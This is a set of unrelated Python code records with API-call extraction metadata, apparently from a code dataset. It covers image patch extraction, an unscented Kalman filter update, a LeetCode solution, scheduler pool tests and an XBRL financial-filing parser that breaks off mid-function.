if np.count_nonzero(hand_patch) < min_hand or np.count_nonzero(hand_patch) > max_hand:
# ignore patches that have too few/much hand
non_hand_patch_count += 1
continue
patho_patch = patho[i:i+patch_size, j:j+patch_size]
if np.count_nonzero(patho_patch) < min_patho or np.count_nonzero(patho_patch) > max_patho:
# ignore patches that have too few/much patho
non_patho_patch_count += 1
continue
# save patches
image_patch = image[i:i+patch_size, j:j+patch_size]
combined_patch = combined[i:i+patch_size, j:j+patch_size]
imsave("{}/{}/{}".format(output_dir, image_subdir, add_patch_to_file_name(image_filename, found_patch_count)), image_patch)
imsave("{}/{}/{}".format(output_dir, hand_subdir, add_patch_to_file_name(hand_filename, found_patch_count)), hand_patch)
imsave("{}/{}/{}".format(output_dir, patho_subdir, add_patch_to_file_name(patho_filename, found_patch_count)), patho_patch)
imsave("{}/{}/{}".format(output_dir, combined_subdir, add_patch_to_file_name(combined_filename, found_patch_count)), combined_patch)
found_patch_count += 1
tf.logging.info("Found {} patches and ignored {}/{}/{} (bad-hand/bad-patho/partial) in file '{}'".format(
found_patch_count, non_hand_patch_count, non_patho_patch_count, partial_patch_count, image_filename))
return found_patch_count
def main():
# handle arguments and config
args = parse_arguments()
tf.logging.info("Args: {}".format(args))
data_dir = os.path.join("data", args.data_dir)
image_dir = os.path.join(data_dir, image_subdir)
hand_dir = os.path.join(data_dir, hand_subdir)
patho_dir = os.path.join(data_dir, patho_subdir)
combined_dir = os.path.join(data_dir, combined_subdir)
if args.verify:
verify_data_integrity(image_dir, hand_dir, patho_dir, combined_dir)
for sub_dir in data_subdirs:
assert not os.path.exists(os.path.join(args.output_dir, sub_dir)), \
"Output directory '{}' exists already, select another!".format(args.output_dir)
os.makedirs(os.path.join(args.output_dir, sub_dir))
found_patch_count = 0
processed_image_count = 0
for image_file in glob("{}/*{}.png".format(image_dir, args.match_pattern + "*" if args.match_pattern else "")):
found_patch_count += find_patches_in_file(image_file, hand_dir, patho_dir, combined_dir, args.output_dir, args)
processed_image_count += 1
tf.logging.info("Found {} patches in {} images".format(found_patch_count, processed_image_count))
if __name__ == "__main__":
START_TIME = time.time()
tf.logging.set_verbosity(tf.logging.INFO)
try:
main()
except Exception as ex:
tf.logging.fatal("Exception occurred: {}".format(traceback.format_exc()))
finally:
tf.logging.info("Finished execution after {:.1f}m".format((time.time() - START_TIME) / 60))
|
[
"utils.get_patho_segmentation_for_image",
"utils.get_combined_segmentation_for_image",
"numpy.count_nonzero",
"argparse.ArgumentParser",
"tensorflow.logging.info",
"os.path.basename",
"tensorflow.logging.set_verbosity",
"time.time",
"utils.get_hand_segmentation_for_image",
"os.path.splitext",
"traceback.format_exc",
"os.path.join",
"scipy.misc.imread"
] |
[((471, 487), 'argparse.ArgumentParser', 'ArgumentParser', ([], {}), '()\n', (485, 487), False, 'from argparse import ArgumentParser\n'), ((2610, 2721), 'tensorflow.logging.info', 'tf.logging.info', (['"""There seems to be exactly one hand, pathology, and combined segmentation per image"""'], {}), "(\n 'There seems to be exactly one hand, pathology, and combined segmentation per image'\n )\n", (2625, 2721), True, 'import tensorflow as tf\n'), ((3334, 3362), 'os.path.basename', 'os.path.basename', (['image_file'], {}), '(image_file)\n', (3350, 3362), False, 'import os\n'), ((3373, 3391), 'scipy.misc.imread', 'imread', (['image_file'], {}), '(image_file)\n', (3379, 3391), False, 'from scipy.misc import imread, imsave\n'), ((3406, 3459), 'utils.get_hand_segmentation_for_image', 'get_hand_segmentation_for_image', (['image_file', 'hand_dir'], {}), '(image_file, hand_dir)\n', (3437, 3459), False, 'from utils import get_hand_segmentation_for_image, get_combined_segmentation_for_image, get_patho_segmentation_for_image, hand_subdir, image_subdir, data_subdirs, patho_subdir, combined_subdir\n'), ((3478, 3505), 'os.path.basename', 'os.path.basename', (['hand_file'], {}), '(hand_file)\n', (3494, 3505), False, 'import os\n'), ((3515, 3532), 'scipy.misc.imread', 'imread', (['hand_file'], {}), '(hand_file)\n', (3521, 3532), False, 'from scipy.misc import imread, imsave\n'), ((3548, 3603), 'utils.get_patho_segmentation_for_image', 'get_patho_segmentation_for_image', (['image_file', 'patho_dir'], {}), '(image_file, patho_dir)\n', (3580, 3603), False, 'from utils import get_hand_segmentation_for_image, get_combined_segmentation_for_image, get_patho_segmentation_for_image, hand_subdir, image_subdir, data_subdirs, patho_subdir, combined_subdir\n'), ((3614, 3632), 'scipy.misc.imread', 'imread', (['patho_file'], {}), '(patho_file)\n', (3620, 3632), False, 'from scipy.misc import imread, imsave\n'), ((3652, 3680), 'os.path.basename', 'os.path.basename', (['patho_file'], {}), '(patho_file)\n', (3668, 3680), False, 'import os\n'), ((3699, 3760), 'utils.get_combined_segmentation_for_image', 'get_combined_segmentation_for_image', (['image_file', 'combined_dir'], {}), '(image_file, combined_dir)\n', (3734, 3760), False, 'from utils import get_hand_segmentation_for_image, get_combined_segmentation_for_image, get_patho_segmentation_for_image, hand_subdir, image_subdir, data_subdirs, patho_subdir, combined_subdir\n'), ((3774, 3795), 'scipy.misc.imread', 'imread', (['combined_file'], {}), '(combined_file)\n', (3780, 3795), False, 'from scipy.misc import imread, imsave\n'), ((3818, 3849), 'os.path.basename', 'os.path.basename', (['combined_file'], {}), '(combined_file)\n', (3834, 3849), False, 'import os\n'), ((5781, 5816), 'os.path.join', 'os.path.join', (['"""data"""', 'args.data_dir'], {}), "('data', args.data_dir)\n", (5793, 5816), False, 'import os\n'), ((5831, 5867), 'os.path.join', 'os.path.join', (['data_dir', 'image_subdir'], {}), '(data_dir, image_subdir)\n', (5843, 5867), False, 'import os\n'), ((5881, 5916), 'os.path.join', 'os.path.join', (['data_dir', 'hand_subdir'], {}), '(data_dir, hand_subdir)\n', (5893, 5916), False, 'import os\n'), ((5931, 5967), 'os.path.join', 'os.path.join', (['data_dir', 'patho_subdir'], {}), '(data_dir, patho_subdir)\n', (5943, 5967), False, 'import os\n'), ((5985, 6024), 'os.path.join', 'os.path.join', (['data_dir', 'combined_subdir'], {}), '(data_dir, combined_subdir)\n', (5997, 6024), False, 'import os\n'), ((6824, 6835), 'time.time', 'time.time', ([], {}), '()\n', (6833, 6835), False, 'import time\n'), ((6838, 6879), 'tensorflow.logging.set_verbosity', 'tf.logging.set_verbosity', (['tf.logging.INFO'], {}), '(tf.logging.INFO)\n', (6862, 6879), True, 'import tensorflow as tf\n'), ((2383, 2435), 'utils.get_hand_segmentation_for_image', 'get_hand_segmentation_for_image', (['file_name', 'hand_dir'], {}), '(file_name, hand_dir)\n', (2414, 2435), False, 'from utils import get_hand_segmentation_for_image, get_combined_segmentation_for_image, get_patho_segmentation_for_image, hand_subdir, image_subdir, data_subdirs, patho_subdir, combined_subdir\n'), ((2463, 2517), 'utils.get_patho_segmentation_for_image', 'get_patho_segmentation_for_image', (['file_name', 'patho_dir'], {}), '(file_name, patho_dir)\n', (2495, 2517), False, 'from utils import get_hand_segmentation_for_image, get_combined_segmentation_for_image, get_patho_segmentation_for_image, hand_subdir, image_subdir, data_subdirs, patho_subdir, combined_subdir\n'), ((2545, 2605), 'utils.get_combined_segmentation_for_image', 'get_combined_segmentation_for_image', (['file_name', 'combined_dir'], {}), '(file_name, combined_dir)\n', (2580, 2605), False, 'from utils import get_hand_segmentation_for_image, get_combined_segmentation_for_image, get_patho_segmentation_for_image, hand_subdir, image_subdir, data_subdirs, patho_subdir, combined_subdir\n'), ((2832, 2859), 'os.path.splitext', 'os.path.splitext', (['file_name'], {}), '(file_name)\n', (2848, 2859), False, 'import os\n'), ((6325, 6363), 'os.path.join', 'os.path.join', (['args.output_dir', 'sub_dir'], {}), '(args.output_dir, sub_dir)\n', (6337, 6363), False, 'import os\n'), ((6178, 6216), 'os.path.join', 'os.path.join', (['args.output_dir', 'sub_dir'], {}), '(args.output_dir, sub_dir)\n', (6190, 6216), False, 'import os\n'), ((4261, 4289), 'numpy.count_nonzero', 'np.count_nonzero', (['hand_patch'], {}), '(hand_patch)\n', (4277, 4289), True, 'import numpy as np\n'), ((4304, 4332), 'numpy.count_nonzero', 'np.count_nonzero', (['hand_patch'], {}), '(hand_patch)\n', (4320, 4332), True, 'import numpy as np\n'), ((4517, 4546), 'numpy.count_nonzero', 'np.count_nonzero', (['patho_patch'], {}), '(patho_patch)\n', (4533, 4546), True, 'import numpy as np\n'), ((4562, 4591), 'numpy.count_nonzero', 'np.count_nonzero', (['patho_patch'], {}), '(patho_patch)\n', (4578, 4591), True, 'import numpy as np\n'), ((6977, 6999), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (6997, 6999), False, 'import traceback\n'), ((7076, 7087), 'time.time', 'time.time', ([], {}), '()\n', (7085, 7087), False, 'import time\n')]
|
import sys
if(sys.version_info >= (3, 8)):
from importlib.metadata import version
else:
from importlib_metadata import version
__version__ = version(__package__)
from .captcha9kw import api9kw, CaptchaError
__all__ = ["api9kw", "CaptchaError"]
|
[
"importlib_metadata.version"
] |
[((150, 170), 'importlib_metadata.version', 'version', (['__package__'], {}), '(__package__)\n', (157, 170), False, 'from importlib_metadata import version\n')]
|
import numpy as np
from numpy.linalg import inv
def ukfupdate(xsigmapts, ysigmapts, yobs, sigw):
"""Provides Updated mean and covariance.
:param xsigmapts: prior state sigma points.
:param ysigmapts: measurement generated by prior state sigma points.
:param yobs: actual measurement.
:param sigw: sigma point weights.
:return: updatedata.
"""
# Calculating the mean of xsigmapts
xm = xsigmapts.mean(0)
# Calculating the mean of ysigmapts
ym = ysigmapts.mean(0)
# Calculating pxx
l1 = np.shape(xsigmapts)[0]
pxx = np.zeros((l1, l1))
pyy = np.zeros((l1, l1))
pxy = np.zeros((l1, l1))
# If error happens here check for dimension of state space and the number of sigma points
for i in range(0, 2*l1):
pxx = pxx + sigw.wc[i]*np.matmul(xsigmapts[:, i]-xm, (xsigmapts[:, i]-xm).transpose())
pyy = pyy + sigw.wc[i]*np.matmul(ysigmapts[:, i]-ym, (ysigmapts[:, i]-ym).transpose())
pxy = pxy + sigw.wc[i]*np.matmul(xsigmapts[:, i]-xm, (ysigmapts[:, i]-ym).transpose())
K = np.matmul(pxy, inv(pyy))
xmpost = xm + np.matmul(K, (yobs-ym))
xcpost = pxx - np.matmul(np.matmul(K, pyy), K.transpose())
updatedata = {"xmpost": xmpost, "xcpost": xcpost}
return updatedata
|
[
"numpy.shape",
"numpy.linalg.inv",
"numpy.zeros",
"numpy.matmul"
] |
[((572, 590), 'numpy.zeros', 'np.zeros', (['(l1, l1)'], {}), '((l1, l1))\n', (580, 590), True, 'import numpy as np\n'), ((601, 619), 'numpy.zeros', 'np.zeros', (['(l1, l1)'], {}), '((l1, l1))\n', (609, 619), True, 'import numpy as np\n'), ((630, 648), 'numpy.zeros', 'np.zeros', (['(l1, l1)'], {}), '((l1, l1))\n', (638, 648), True, 'import numpy as np\n'), ((539, 558), 'numpy.shape', 'np.shape', (['xsigmapts'], {}), '(xsigmapts)\n', (547, 558), True, 'import numpy as np\n'), ((1080, 1088), 'numpy.linalg.inv', 'inv', (['pyy'], {}), '(pyy)\n', (1083, 1088), False, 'from numpy.linalg import inv\n'), ((1108, 1131), 'numpy.matmul', 'np.matmul', (['K', '(yobs - ym)'], {}), '(K, yobs - ym)\n', (1117, 1131), True, 'import numpy as np\n'), ((1161, 1178), 'numpy.matmul', 'np.matmul', (['K', 'pyy'], {}), '(K, pyy)\n', (1170, 1178), True, 'import numpy as np\n')]
|
"""
Question Source: https://leetcode.com/problems/find-the-town-judge/
Level: Easy
Topic: Graph
Solver: Tayyrov
Date: 03.01.2022
"""
from collections import defaultdict
def findJudge_solution1(trust, n) -> int:
trustees = defaultdict(set) # as the values are unique list as a value type can be used too
trusters = set() # these can not be a judge
for person, judge in trust:
trustees[judge].add(person)
trusters.add(person)
for key, val in trustees.items():
if key not in trusters and len(val) == n - 1: # contains all except itself
return key # Logically there can be only one person who has N-1 votes and trusts nobody, so we can
# return whenever we find one
# edge_case: when we have only one person and empty trust list => means everyone except itself trusts him
if n == 1 and trust == []:
return 1
return -1
# alternative solution using counting
def findJudge_solution2(trust, n) -> int:
frequency_table = [0] * (n)
for trusting, being_trusted in trust:
frequency_table[trusting - 1] -= 1
frequency_table[being_trusted - 1] += 1
for idx in range(n):
if frequency_table[idx] == n - 1: # if someone trusts anyone it would have less thant N-1 trustees as
# trusting someone is -1. similarly is someone doesnt trust you, then again it is not possible to get N-1
# value (-1 comes because judge doesnt trust himself)
return idx + 1
return -1
|
[
"collections.defaultdict"
] |
[((240, 256), 'collections.defaultdict', 'defaultdict', (['set'], {}), '(set)\n', (251, 256), False, 'from collections import defaultdict\n')]
|
from containers import Databases
from file import load_databases_from_file as load
load()
print(Databases.databases)
|
[
"file.load_databases_from_file"
] |
[((83, 89), 'file.load_databases_from_file', 'load', ([], {}), '()\n', (87, 89), True, 'from file import load_databases_from_file as load\n')]
|
import pytest
from pexen.sched import TaskRes
from pexen.sched.pool import PoolError
from tests.sched.common import *
from tests.sched.common import check_resources
@parametrize_pool_both()
def test_pool_reuse(pool):
dummy1 = create_dummy('dummy1')
dummy2 = create_dummy('dummy2')
p = pool()
p.register([dummy1])
p.start()
p.submit(dummy1)
p.shutdown(wait=True)
assert not p.empty()
assert not p.alive()
res = list(p.iter_results()) # also tests results-after-shutdown
assert p.empty()
assert res == [TaskRes(dummy1)]
p.register([dummy2])
p.start()
p.submit(dummy1)
p.submit(dummy2)
p.shutdown(wait=True)
assert not p.empty()
assert not p.alive()
res = list(p.iter_results()) # also tests results-after-shutdown
assert p.empty()
assert TaskRes(dummy1) in res
assert TaskRes(dummy2) in res
@parametrize_pool_both()
def test_shutdown_without_gather(pool):
dummy1 = create_dummy('dummy1')
p = pool()
p.register([dummy1])
p.start()
p.submit(dummy1)
p.shutdown(wait=True)
@parametrize_pool_thread()
def test_onthefly_thread(pool):
dummy1 = create_dummy('dummy1')
dummy2 = create_dummy('dummy2')
p = pool()
p.register([dummy1])
p.start()
p.submit(dummy1)
p.submit(dummy2)
assert p.alive()
p.shutdown()
res = list(p.iter_results())
assert not p.alive()
assert TaskRes(dummy1) in res
assert TaskRes(dummy2) in res
@parametrize_pool_process()
def test_onthefly_process(pool):
dummy1 = create_dummy('dummy1')
dummy2 = create_dummy('dummy2')
p = pool()
p.register([dummy1])
p.start()
with pytest.raises(PoolError) as exc:
p.register([dummy2])
assert "Cannot register tasks while the pool is running" in str(exc.value)
p.submit(dummy1)
with pytest.raises(PoolError) as exc:
p.submit(dummy2)
assert "Cannot submit unregistered task" in str(exc.value)
assert p.alive()
p.shutdown()
res = list(p.iter_results())
assert not p.alive()
assert TaskRes(dummy1) in res
@parametrize_pool_thread()
def test_submit_tail(pool):
dummy1 = create_dummy('dummy1')
dummy2 = create_dummy('dummy2')
p = pool()
p.register([dummy1,dummy2])
p.start()
p.submit(dummy1)
res = p.iter_results()
assert TaskRes(dummy1) == next(res)
p.submit(dummy2)
assert TaskRes(dummy2) == next(res)
p.shutdown()
with pytest.raises(StopIteration):
next(res)
|
[
"pytest.raises",
"pexen.sched.TaskRes"
] |
[((829, 844), 'pexen.sched.TaskRes', 'TaskRes', (['dummy1'], {}), '(dummy1)\n', (836, 844), False, 'from pexen.sched import TaskRes\n'), ((863, 878), 'pexen.sched.TaskRes', 'TaskRes', (['dummy2'], {}), '(dummy2)\n', (870, 878), False, 'from pexen.sched import TaskRes\n'), ((1424, 1439), 'pexen.sched.TaskRes', 'TaskRes', (['dummy1'], {}), '(dummy1)\n', (1431, 1439), False, 'from pexen.sched import TaskRes\n'), ((1458, 1473), 'pexen.sched.TaskRes', 'TaskRes', (['dummy2'], {}), '(dummy2)\n', (1465, 1473), False, 'from pexen.sched import TaskRes\n'), ((1678, 1702), 'pytest.raises', 'pytest.raises', (['PoolError'], {}), '(PoolError)\n', (1691, 1702), False, 'import pytest\n'), ((1849, 1873), 'pytest.raises', 'pytest.raises', (['PoolError'], {}), '(PoolError)\n', (1862, 1873), False, 'import pytest\n'), ((2077, 2092), 'pexen.sched.TaskRes', 'TaskRes', (['dummy1'], {}), '(dummy1)\n', (2084, 2092), False, 'from pexen.sched import TaskRes\n'), ((2348, 2363), 'pexen.sched.TaskRes', 'TaskRes', (['dummy1'], {}), '(dummy1)\n', (2355, 2363), False, 'from pexen.sched import TaskRes\n'), ((2409, 2424), 'pexen.sched.TaskRes', 'TaskRes', (['dummy2'], {}), '(dummy2)\n', (2416, 2424), False, 'from pexen.sched import TaskRes\n'), ((2464, 2492), 'pytest.raises', 'pytest.raises', (['StopIteration'], {}), '(StopIteration)\n', (2477, 2492), False, 'import pytest\n'), ((553, 568), 'pexen.sched.TaskRes', 'TaskRes', (['dummy1'], {}), '(dummy1)\n', (560, 568), False, 'from pexen.sched import TaskRes\n')]
|
#! /usr/bin/env python
# encoding: utf-8
import re
from marshmallow import Schema, fields
import datetime
from collections import OrderedDict
from dataclasses import dataclass
import logging
from io import StringIO
def soup_maker(fh):
""" Takes a file handler returns BeautifulSoup"""
try:
from bs4 import BeautifulSoup
soup = BeautifulSoup(fh, "lxml")
for tag in soup.find_all():
tag.name = tag.name.lower()
except ImportError:
from BeautifulSoup import BeautifulStoneSoup
soup = BeautifulStoneSoup(fh)
return soup
class XBRLFile:
def __init__(self, fh):
"""
fh should be a seekable file-like byte stream object
"""
self.headers = OrderedDict()
self.fh = fh
class XBRLException(Exception):
pass
class XBRL:
def __init__(self):
self.context_ids = {}
self.gaap_data = {}
self.dei = None
self.custom_data = None
def get_GAAP(self, context, end_date=None):
# the default is today
if end_date is None:
end_date = datetime.date.today()
elif isinstance(end_date, str):
end_date = datetime.datetime.strptime(end_date, "%Y%m%d")
# current is the previous quarter
if context == "quarter":
context = datetime.timedelta(days=90)
elif context == "year":
context = datetime.timedelta(days=360)
elif context == "instant":
pass
elif isinstance(context, datetime.timedelta):
pass
else:
try:
context = datetime.timedelta(days=int(context))
except (ValueError, TypeError):
raise ValueError('invalid context')
# we need start date unless instant
start_date = None
if context != "instant":
start_date = end_date - context
ctx_id = None
for cid, ctx_dates in self.context_ids.items():
if context == "instant" and len(ctx_dates) == 1 and ctx_dates[0] == end_date:
ctx_id = cid
break
elif len(ctx_dates) == 2:
found_start_date, found_end_date = ctx_dates
if (context <= (found_end_date - found_start_date) <= (context + datetime.timedelta(weeks=1))) \
and (found_end_date == end_date):
ctx_id = cid
break
if ctx_id is None:
raise Exception("no context id matched")
gaap_obj = GAAP()
for k, k_data in self.gaap_data.items():
v = k_data.get(ctx_id, 0.)
setattr(gaap_obj, k, v)
return gaap_obj
def get_quarterlies(self, field_names):
data = {x: {} for x in field_names}
ctx_ids = [x for x in self.context_ids.keys() if x.endswith("QTD")]
quarter_re = re.compile("[0-9]{4}Q[1-4]")
ctx_dict = OrderedDict([(cid, quarter_re.search(cid).group(0)) for cid in sorted(ctx_ids)])
for k in field_names:
for cid, quarter in ctx_dict.items():
data[k][quarter] = self.gaap_data[k].get(cid)
return data
def get_yearlies(self, field_names):
data = {x: {} for x in field_names}
ctx_ids = [x for x in self.context_ids.keys() if x.endswith("Q4YTD")]
year_re = re.compile("[0-9]{4}")
ctx_dict = OrderedDict([(cid, int(year_re.search(cid).group(0))) for cid in sorted(ctx_ids)])
for k in field_names:
for cid, year in ctx_dict.items():
data[k][year] = self.gaap_data[k].get(cid)
return data
@classmethod
def from_file(cls, file_handle, ignore_errors=0):
"""
parse is the main entry point for an XBRL. It takes a file
handle.
"""
if ignore_errors == 2:
logging.basicConfig(filename='/tmp/xbrl.log',
level=logging.ERROR,
format='%(asctime)s %(levelname)s %(name)s %(message)s')
logger = logging.getLogger(__name__)
else:
logger = None
xbrl_obj = cls()
# if no file handle was given create our own
if not hasattr(file_handle, 'read'):
file_handler = open(file_handle)
else:
file_handler = file_handle
# Store the headers
xbrl_file = XBRLPreprocessedFile(file_handler)
xbrl = soup_maker(xbrl_file.fh)
file_handler.close()
xbrl_obj.context_ids = XBRL.parse_contexts(xbrl)
xbrl_obj.gaap_data = XBRL.parse_GAAP(xbrl, ignore_errors, logger)
xbrl_obj.dei = XBRL.parse_DEI(xbrl, ignore_errors, logger)
xbrl_obj.custom_data = XBRL.parse_custom(xbrl, ignore_errors, logger)
return xbrl_obj
@staticmethod
def parse_contexts(xbrl):
xbrl_base = xbrl.find(name=re.compile("xbrl*:*"))
if xbrl.find('xbrl') is None and xbrl_base is None:
raise XBRLException('The xbrl file is empty!')
# lookahead to see if we need a custom leading element
lookahead = xbrl.find(name=re.compile("context",
re.IGNORECASE | re.MULTILINE)).name
if ":" in lookahead:
xbrl_base = lookahead.split(":")[0] + ":"
else:
xbrl_base = ""
doc_root = ""
# we might need to attach the document root
if len(xbrl_base) > 1:
doc_root = xbrl_base
# collect all contexts up that are relevant to us
# TODO - Maybe move this to Preprocessing Ingestion
context_ids = {}
context_tags = xbrl.find_all(name=re.compile(doc_root + "context",
re.IGNORECASE | re.MULTILINE))
try:
for context_tag in context_tags:
# we don't want any segments
if context_tag.find(doc_root + "entity") is None:
continue
if context_tag.find(doc_root + "entity").find(
doc_root + "segment") is None:
context_id = context_tag.attrs['id']
found_start_date = None
found_end_date = None
if context_tag.find(doc_root + "instant"):
instant = \
datetime.datetime.strptime(re.compile('[^\d]+')
.sub('', context_tag
.find(doc_root +
"instant")
.text)[:8], "%Y%m%d")
context_ids[context_id] = (instant,)
continue
if context_tag.find(doc_root + "period").find(
doc_root + "startdate"):
found_start_date = \
datetime.datetime.strptime(re.compile('[^\d]+')
.sub('', context_tag
.find(doc_root +
"period")
.find(doc_root +
"startdate")
.text)[:8], "%Y%m%d")
if context_tag.find(doc_root + "period").find(doc_root +
"enddate"):
found_end_date = \
datetime.datetime.strptime(re.compile('[^\d]+')
.sub('', context_tag
.find(doc_root +
"period")
.find(doc_root +
"enddate")
.text)[:8], "%Y%m%d")
if found_end_date and found_start_date:
context_ids[context_id] = (found_start_date, found_end_date)
except IndexError:
raise XBRLException('problem getting contexts')
return context_ids
@staticmethod
def parse_GAAP(xbrl,
ignore_errors,
logger):
"""
Parse GAAP from our XBRL soup
"""
gaap_data = {}
assets = xbrl.find_all("us-gaap:assets")
gaap_data["assets"] = XBRL.data_processing(assets, ignore_errors, logger)
current_assets = \
xbrl.find_all("us-gaap:assetscurrent")
gaap_data["current_assets"] = XBRL.data_processing(current_assets, ignore_errors, logger)
non_current_assets = \
xbrl.find_all(name=re.compile("(us-gaap:)[^s]*(assetsnoncurrent)",
re.IGNORECASE | re.MULTILINE))
if non_current_assets == 0 or not non_current_assets:
# Assets = AssetsCurrent + AssetsNoncurrent
gaap_data["non_current_assets"] = gaap_data["assets"] \
- gaap_data["current_assets"]
else:
gaap_data["non_current_assets"] = \
XBRL.data_processing(non_current_assets, ignore_errors, logger)
liabilities_and_equity = \
xbrl.find_all(name=re.compile("(us-gaap:)[^s]*(liabilitiesand)",
re.IGNORECASE | re.MULTILINE))
gaap_data["liabilities_and_equity"] = \
XBRL.data_processing(liabilities_and_equity, ignore_errors, logger)
liabilities = \
xbrl.find_all(name=re.compile("(us-gaap:)[^s]*(liabilities)",
re.IGNORECASE | re.MULTILINE))
gaap_data["liabilities"] = \
XBRL.data_processing(liabilities, ignore_errors, logger)
current_liabilities = \
xbrl.find_all(name=re.compile("(us-gaap:)[^s]\
*(currentliabilities)",
re.IGNORECASE | re.MULTILINE))
gaap_data["current_liabilities"] = \
XBRL.data_processing(current_liabilities, ignore_errors, logger)
noncurrent_liabilities = \
xbrl.find_all(name=re.compile("(us-gaap:)[^s]\
*(noncurrentliabilities)",
re.IGNORECASE | re.MULTILINE))
gaap_data["noncurrent_liabilities"] = \
XBRL.data_processing(noncurrent_liabilities, ignore_errors, logger)
commitments_and_contingencies = \
xbrl.find_all(name=re.compile("(us-gaap:commitments\
andcontingencies)",
re.IGNORECASE | re.MULTILINE))
gaap_data["commitments_and_contingencies"] = \
XBRL.data_processing(commitments_and_contingencies, ignore_errors, logger)
redeemable_noncontrolling_interest = \
xbrl.find_all(name=re.compile("(us-gaap:redeemablenoncontrolling\
interestequity)", re.IGNORECASE | re.MULTILINE))
gaap_data["redeemable_noncontrolling_interest"] = \
XBRL.data_processing(redeemable_noncontrolling_interest, ignore_errors, logger)
temporary_equity = \
xbrl.find_all(name=re.compile("(us-gaap:)[^s]*(temporaryequity)",
re.IGNORECASE | re.MULTILINE))
gaap_data["temporary_equity"] = \
XBRL.data_processing(temporary_equity, ignore_errors, logger)
equity = xbrl.find_all(name=re.compile("(us-gaap:)[^s]*(equity)",
re.IGNORECASE | re.MULTILINE))
gaap_data["equity"] = XBRL.data_processing(equity, ignore_errors, logger)
equity_attributable_interest = \
xbrl.find_all(name=re.compile("(us-gaap:minorityinterest)",
re.IGNORECASE | re.MULTILINE))
equity_attributable_interest += \
xbrl.find_all(name=re.compile("(us-gaap:partnerscapitalattributable\
tononcontrollinginterest)",
re.IGNORECASE | re.MULTILINE))
gaap_data["equity_attributable_interest"] = \
XBRL.data_processing(equity_attributable_interest, ignore_errors, logger)
equity_attributable_parent = \
xbrl.find_all(name=re.compile("(us-gaap:liabilitiesandpartners\
capital)",
re.IGNORECASE | re.MULTILINE))
stockholders_equity = \
xbrl.find_all(name=re.compile("(us-gaap:stockholdersequity)",
re.IGNORECASE | re.MULTILINE))
gaap_data["equity_attributable_parent"] = \
XBRL.data_processing(equity_attributable_parent, ignore_errors, logger)
gaap_data["stockholders_equity"] = \
XBRL.data_processing(stockholders_equity, ignore_errors, logger)
# Incomes #
revenues = xbrl.find_all(name=re.compile("(us-gaap:)[^s]*(revenues)",
re.IGNORECASE | re.MULTILINE))
gaap_data["revenues"] = XBRL.data_processing(revenues, ignore_errors, logger)
cost_of_revenue = \
xbrl.find_all(name=re.compile("(us-gaap:costofrevenue)",
re.IGNORECASE | re.MULTILINE))
cost_of_revenue += \
xbrl.find_all(name=re.compile("(us-gaap:costofservices)",
re.IGNORECASE | re.MULTILINE))
cost_of_revenue += \
xbrl.find_all(name=re.compile("(us-gaap:costofgoodssold)",
re.IGNORECASE | re.MULTILINE))
cost_of_revenue += \
xbrl.find_all(name=re.compile("(us-gaap:costofgoodsand\
servicessold)",
re.IGNORECASE | re.MULTILINE))
gaap_data["cost_of_revenue"] = \
XBRL.data_processing(cost_of_revenue, ignore_errors, logger)
gross_profit = \
xbrl.find_all(name=re.compile("(us-gaap:)[^s]*(grossprofit)",
re.IGNORECASE | re.MULTILINE))
gaap_data["gross_profit"] = \
XBRL.data_processing(gross_profit, ignore_errors, logger)
operating_expenses = \
xbrl.find_all(name=re.compile("(us-gaap:operating)[^s]*(expenses)",
re.IGNORECASE | re.MULTILINE))
gaap_data["operating_expenses"] = \
XBRL.data_processing(operating_expenses, ignore_errors, logger)
costs_and_expenses = \
xbrl.find_all(name=re.compile("(us-gaap:)[^s]*(costsandexpenses)",
re.IGNORECASE | re.MULTILINE))
gaap_data["costs_and_expenses"] = \
XBRL.data_processing(costs_and_expenses, ignore_errors, logger)
other_operating_income = \
xbrl.find_all(name=re.compile("(us-gaap:otheroperatingincome)",
re.IGNORECASE | re.MULTILINE))
gaap_data["other_operating_income"] = \
XBRL.data_processing(other_operating_income, ignore_errors, logger)
operating_income_loss = \
xbrl.find_all(name=re.compile("(us-gaap:otheroperatingincome)",
re.IGNORECASE | re.MULTILINE))
gaap_data["operating_income_loss"] = \
XBRL.data_processing(operating_income_loss, ignore_errors, logger)
nonoperating_income_loss = \
xbrl.find_all(name=re.compile("(us-gaap:nonoperatingincomeloss)",
re.IGNORECASE | re.MULTILINE))
gaap_data["nonoperating_income_loss"] = \
XBRL.data_processing(nonoperating_income_loss, ignore_errors, logger)
interest_and_debt_expense = \
xbrl.find_all(name=re.compile("(us-gaap:interestanddebtexpense)",
re.IGNORECASE | re.MULTILINE))
gaap_data["interest_and_debt_expense"] = \
XBRL.data_processing(interest_and_debt_expense, ignore_errors, logger)
income_before_equity_investments = \
xbrl.find_all(name=re.compile("(us-gaap:incomelossfromcontinuing"
"operationsbeforeincometaxes"
"minorityinterest)",
re.IGNORECASE | re.MULTILINE))
gaap_data["income_before_equity_investments"] = \
XBRL.data_processing(income_before_equity_investments, ignore_errors, logger)
income_from_equity_investments = \
xbrl.find_all(name=re.compile("(us-gaap:incomelossfromequity"
"methodinvestments)", re.IGNORECASE | re.MULTILINE))
gaap_data["income_from_equity_investments"] = \
XBRL.data_processing(income_from_equity_investments, ignore_errors, logger)
income_tax_expense_benefit = \
xbrl.find_all(name=re.compile("(us-gaap:incometaxexpensebenefit)",
re.IGNORECASE | re.MULTILINE))
gaap_data["income_tax_expense_benefit"] = \
XBRL.data_processing(income_tax_expense_benefit, ignore_errors, logger)
income_continuing_operations_tax = \
xbrl.find_all(name=re.compile("(us-gaap:IncomeLossBeforeExtraordinaryItems\
AndCumulativeEffectOfChangeInAccountingPrinciple)",
re.IGNORECASE | re.MULTILINE))
gaap_data["income_continuing_operations_tax"] = \
XBRL.data_processing(income_continuing_operations_tax, ignore_errors, logger)
income_discontinued_operations = \
xbrl.find_all(name=re.compile("(us-gaap:)[^s]*(discontinued"
"operation)", re.IGNORECASE | re.MULTILINE))
gaap_data["income_discontinued_operations"] = \
XBRL.data_processing(income_discontinued_operations, ignore_errors, logger)
extraordary_items_gain_loss = \
xbrl.find_all(name=re.compile("(us-gaap:extraordinaryitem"
"netoftax)", re.IGNORECASE | re.MULTILINE))
gaap_data["extraordary_items_gain_loss"] = \
XBRL.data_processing(extraordary_items_gain_loss, ignore_errors, logger)
income_loss = \
xbrl.find_all(name=re.compile("(us-gaap:)[^s]*(incomeloss)",
re.IGNORECASE | re.MULTILINE))
gaap_data["income_loss"] = \
XBRL.data_processing(income_loss, ignore_errors, logger)
income_loss += xbrl.find_all(name=re.compile("(us-gaap:profitloss)",
re.IGNORECASE | re.MULTILINE))
